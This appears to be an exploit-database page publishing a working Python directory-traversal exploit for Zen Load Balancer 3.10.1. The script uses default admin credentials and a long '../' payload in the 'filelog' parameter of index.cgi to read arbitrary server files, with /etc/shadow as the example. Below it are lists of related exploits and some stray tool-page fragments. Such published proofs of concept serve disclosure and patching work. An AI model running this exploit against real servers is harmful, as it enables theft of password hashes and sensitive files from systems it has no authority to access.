Menu

Search for hundreds of thousands of exploits

"Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal"

Author

Exploit author

"Basim Alabdullah"

Platform

Exploit platform

cgi

Release date

Exploit published date

2020-04-10

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
# Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
# Date: 2020-04-10
# Exploit Author: Basim Alabdullah
# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
# Version: 3.10.1
# Tested on: Debian8u2
#
# Technical Details:
# The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
# The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response.
# Note that disclosure of the shadow file may allow an attacker to discover users' passwords
#
# Impact:
# --------
# Successful exploitation could allow an attacker to obtain sensitive
# information.

import requests
import sys

if len(sys.argv) <2:
    print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow")
    sys.exit(-1)
else:
    files=sys.argv[2]
    url=sys.argv[1]    
    with requests.session() as s:
        urlz=url+"/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../"+files+"&nlines=100&action=See+logs"
        response = s.get(urlz, auth=('admin', 'admin'), verify=False)
        txt=response.text
        print(response.text)
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-19 "Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection" webapps cgi "Gabriele Zuddas"
2020-10-29 "Mailman 1.x > 2.1.23 - Cross Site Scripting (XSS)" webapps cgi "Valerio Alessandroni"
2020-04-23 "Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)" webapps cgi "Dhiraj Mishra"
2020-04-10 "Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal" webapps cgi "Basim Alabdullah"
2020-03-30 "Zen Load Balancer 3.10.1 - Remote Code Execution" webapps cgi "Cody Sixteen"
2020-02-11 "CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting" webapps cgi Luca.Chiou
2019-09-09 "Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure" webapps cgi LiquidWorm
2019-07-12 "Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution" webapps cgi "Chris Lyne"
2019-02-18 "Master IP CAM 01 3.3.4.2103 - Remote Command Execution" webapps cgi "Raffaele Sabato"
2019-02-11 "Smoothwall Express 3.1-SP4 - Cross-Site Scripting" webapps cgi "Ozer Goker"
Release Date Title Type Platform Author
2020-07-06 "Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution" webapps php "Basim Alabdullah"
2020-04-20 "Centreon 19.10.5 - 'id' SQL Injection" webapps php "Basim Alabdullah"
2020-04-10 "Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal" webapps cgi "Basim Alabdullah"
2020-04-03 "Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution" webapps php "Basim Alabdullah" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected